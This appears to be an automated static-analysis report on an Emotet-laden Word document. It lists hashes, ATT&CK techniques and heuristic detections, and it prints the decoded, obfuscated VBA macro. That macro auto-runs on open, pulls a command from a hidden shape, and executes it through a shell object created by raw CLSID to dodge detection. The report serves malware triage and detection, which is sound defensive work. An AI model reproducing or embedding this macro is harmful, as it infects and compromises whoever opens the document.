Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 1c52db03729dfd87…

MALICIOUS

Office (OLE)

Size: 89.2 KB
Created: 2018-11-27 10:04:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 87e606ac98f16b7322af5a6a0764dd89
SHA-1: fadf4ce22a78b2523b9df0ee3bd495cd445ac145
SHA-256: 1c52db03729dfd87dd3204d07967f44d5f2451fe88d0ce91267bc199f99c2e24
Risk Score: 252

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros that leverage the WScript.Shell COM object to execute arbitrary commands. Specifically, it constructs and executes a command that appears to download and save a second-stage payload using PowerShell. The presence of the 'AutoOpen' macro and the 'cmd.exe' invocation strongly suggest a downloader functionality, consistent with Emotet's typical behavior.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6826428-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826428-0
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID (severity: critical; rule: OLE_VBA_GETOBJECT_CLSID_DANGEROUS)
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script:
    End Select
    Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
       On Error Resume Next
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script:
    End Select
    Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
       On Error Resume Next
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag (severity: high; rule: SC_STR_CMD)
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7101 bytes
SHA-256: 6d0928e18f206fbcf2557097bb69536455f47f03a65964514d34361a2b4d9ba9
Detection (ClamAV): No threats found
Obfuscation or payload: likely
81 of 140 identifiers look randomly generated (e.g. 'QkzddrZwF') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "LFvMOUDH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
 For Each GNqOahcJj In QnSAShnN
         VUEtj = 324186903 + Oct(267790199) - 35962565 - CBool(301893 / 19523015) * 248041449 + Log(RWajfaNf - CLng(182456325)) - 12662481 + Hex(rOozwzm)
      Next
      Select Case CoThbCUK
         Case 111333709
            bcGvCwRr = Cos(134405757)
            GZhjTsMi = 293750196
         Case 1430403
            GNViszowd = Sqr(77006094 / CSng(107780915 - Cos(320175595 - 301140370) + ZUwMp + Rnd(206111826 - 47077578)))
            zacGnNj = Hex(pRQvVOlMJ)
End Select
   On Error Resume Next
 For Each vXTHwPDo In JaaNokm
         riwJSjo = 12555619 + Oct(267648719) - 170155140 - CBool(211835533 / 292010420) * 270725767 + Log(QOUAiZRXX - CLng(262685727)) - 68929297 + Hex(UwiHsbFN)
      Next
      Select Case uPbcriF
         Case 62724399
            WwoOJLsnG = Cos(82022272)
            TKJzjL = 290973433
         Case 156704314
            hEmbZWzt = Sqr(158633812 / CSng(252453285 - Cos(311504814 - 77665428) + hQOwGm + Rnd(119207337 - 96839430)))
            VtCCj = Hex(cwjmh)
End Select
   On Error Resume Next
 For Each LRjFpwFB In QfNzc
         wsZnZHiCt = 313276589 + Oct(31268410) - 112388666 - CBool(52658254 / 255692241) * 206472109 + Log(UuMNdT - CLng(3874280)) - 121579296 + Hex(SRNpi)
      Next
      Select Case lYwnnbR
         Case 208843991
            cPqKkhz = Cos(95028179)
            CLTmOUi = 289421116
         Case 48464696
            HqUMKVTs = Sqr(75251326 / CSng(339518029 - Cos(290901400 - 253639720) + OklOd + Rnd(278867350 - 220706598)))
            UDqnXGw = Hex(cJvUj)
End Select
   On Error Resume Next
 For Each QkzddrZwF In YiznO
         AuDzJ = 230640565 + Oct(27007682) - 332786226 - CBool(128204748 / 8269376) * 170551415 + Log(aCNiDX - CLng(38054539)) - 39295480 + Hex(ziFcTajPc)
      Next
      Select Case ampfaFt
         Case 243486468
            jBJcSLWD = Cos(267269743)
            iahIHAMzX = 275219642
         Case 53818524
            iqazakX = Sqr(256784057 / CSng(192752098 - Cos(63254733 - 251825007) + ZwpGnRz + Rnd(156090911 - 289622425)))
            zAtiiiO = Hex(WvZJS)
End Select
Set sqbqdoj = Shapes("GajSAfqNUN")
   On Error Resume Next
 For Each CiofPPSUm In JGUDHDNAk
         kjKrifwB = 243992962 + Oct(245555526) - 126559194 - CBool(292664415 / 15402262) * 183984654 + Log(lWvGw - CLng(193703658)) - 293188912 + Hex(LhzCn)
      Next
      Select Case ZpEHNFSYz
         Case 5545639
            TRjBWRDs = Cos(335245964)
            hStmGsc = 334795808
         Case 61929764
            cIGLvOl = Sqr(271105995 / CSng(148033157 - Cos(252211903 - 85597194) + uWiMJGo + Rnd(109670263 - 316071143)))
            oYsXKU = Hex(NqZnW)
End Select
NbihT = "" + WKsiSTi + XFHjO + IHXXH + DQiJwn + sqbqdoj.TextFrame.TextRange.Text + OUBlAj + ocPkznN + UPvopqc
   On Error Resume Next
 For Each wmmnLzJV In oMJho
         fQiKTQCAn = 341327456 + Oct(8727488) - 210290617 - CBool(163267626 / 129061935) * 163843413 + Log(dEzdlDwO - CLng(197884473)) - 107861224 + Hex(KoIsvX)
      Next
      Select Case jjwPzPvmz
         Case 260083087
            TkCjD = Cos(232203053)
            hKMbU = 136995925
         Case 212881204
            FsMfH = Sqr(41335030 / CSng(55293398 - Cos(185726603 - 237289855) + oOEjizDI + Rnd(24149154 - 71608706)))
            IakYnNNk = Hex(PbiwJ)
End Select
Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
   On Error Resume Next
 For Each pTCqrX In noiRVzGmG
         hiKUs = 151849952 + Oct(15692355) - 116185978 - CBool(233991464 / 95501929) * 302867079 + Log(VRokHAM - CLng(124334041)) - 90093407 + Hex(rnjvUssZF)
      Next
      Select Case sLdjEwzwA
         Case 160441572
            IDNSR = Cos(189508338)
            rGZnolmX = 242519610
         Case 321484578
            JZJIv = Sqr(222087830 / CSng(68193071 - Cos(263987552 - 52286744) + LDPSpnjk + Rnd(144653736 - 191075549)))
            QHizY = Hex(WruhL)
End Select
Const zYXRLdMGf = 0
   On Error Resume Next
 For Each jvzjWqmDU In HGfApsJI
         LYzYwP = 165597555 + Oct(86376666) - 52254248 - CBool(284224542 / 114594614) * 14719510 + Log(DEVZiJS - CLng(296350119)) - 275387566 + Hex(AtnvWvYs)
      Next
      Select Case lXjXhW
         Case 336350581
            zdiMCi = Cos(246818269)
            biPNz = 273116834
         Case 177178822
            mwfKUCR = Sqr(232687051 / CSng(330933894 - Cos(26202110 - 108348466) + TjnDfsUPL + Rnd(172752940 - 327989873)))
            CruQIf = Hex(wwNljr)
End Select
   On Error Resume Next
 For Each lEZibjU In LUvItldA
         AqLuGszB = 97801362 + Oct(294320289) - 132735290 - CBool(56373126 / 175826934) * 200941649 + Log(isQBVV - CLng(237657695)) - 68525647 + Hex(mswQqHi)
      Next
      Select Case zmvIwhi
         Case 76693316
            hMoAikp = Cos(179947327)
            BUbiRQf = 233973021
         Case 50058928
            vjLHOp = Sqr(61363776 / CSng(262723382 - Cos(232460995 - 79161552) + LlqvoXWb + Rnd(56457889 - 50992434)))
            pQFJC = Hex(VicMZQ)
End Select
CKLZrpfQH.Run! NbihT, zYXRLdMGf
   On Error Resume Next
 For Each nNTFFJUOv In AfzCl
         BUkqI = 210955253 + Oct(32331301) - 28177547 - CBool(253145123 / 139736334) * 198952242 + Log(fwPZOWbnL - CLng(262133406)) - 251281561 + Hex(icjkibbY)
      Next
      Select Case vIzMzo
         Case 51291228
            OSkfa = Cos(230715118)
            tbQaazsNi = 337726676
         Case 73707196
            zUZLuGaj = Sqr(264484148 / CSng(118606091 - Cos(85941343 - 115795379) + TiwUBFEt + Rnd(225117020 - 280668151)))
            KAzVC = Hex(PNmIIooHq)
End Select
   On Error Resume Next
 For Each skTEaJbw In CVXjiBf
         EMLiKb = 83180924 + Oct(288302224) - 75934773 - CBool(315011749 / 260037369) * 130989071 + Log(mdVEZT - CLng(109486038)) - 146151880 + Hex(MwHrPb)
      Next
      Select Case HjzuRKOFF
         Case 223141062
            GMPNn = Cos(191392768)
            QrCbE = 220335717
         Case 99063698
            tAMXTLkzE = Sqr(101687224 / CSng(262677007 - Cos(168655391 - 340282365) + PQwsKKJ + Rnd(316363973 - 335269185)))
            ihzkqf = Hex(SfbRNsi)
End Select
   On Error Resume Next
 For Each clUEmKiJ In caNNiLPj
         AqRPBs = 27646222 + Oct(146528149) - 159393842 - CBool(177382718 / 131262164) * 196071723 + Log(phaBaTswq - CLng(215699555)) - 118474896 + Hex(ihrpjjKK)
      Next
      Select Case LzXMk
         Case 186684048
            QmDpI = Cos(243030207)
            fmhkwrNK = 67042207
         Case 341241116
            SLMhrrJ = Sqr(123983316 / CSng(241574423 - Cos(193895227 - 224655750) + oqrsi + Rnd(26784235 - 194234344)))
            czvLCwz = Hex(TtBpXh)
End Select
End Sub